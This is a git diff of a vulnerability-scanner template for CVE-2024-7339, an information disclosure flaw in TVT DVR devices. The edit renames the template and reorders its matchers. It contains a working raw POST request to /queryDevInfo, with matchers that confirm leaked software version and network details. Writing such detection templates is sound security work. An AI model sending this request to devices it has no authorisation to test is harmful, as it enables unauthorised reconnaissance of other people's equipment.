Update CVE-2024-7339.yaml
parent
598ad73b10
commit
cee029a599
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2024-7339
|
||||
|
||||
info:
|
||||
name: Sensitive Device Information Disclosure in TVT DVR
|
||||
name: TVT DVR Sensitive Device Information - Disclosure
|
||||
author: Stuxctf
|
||||
severity: medium
|
||||
description: |
|
||||
|
@ -23,27 +23,24 @@ info:
|
|||
cwe-id: CWE-200
|
||||
epss-score: 0.00045
|
||||
epss-percentile: 0.15505
|
||||
tags: cve,cve2024,dvr,tvt
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /queryDevInfo HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Connection: keep-alive
|
||||
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS like Mac OS X) AppleWebKit (KHTML, like Gecko) Version Mobile Safari
|
||||
Content-Length: 103
|
||||
|
||||
<?xml version="1.0" encoding="utf-8" ?><request version="1.0" systemType="NVMS-9000" clientType="WEB"/>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "softwareVersion"
|
||||
- "eth0"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
Loading…
Reference in New Issue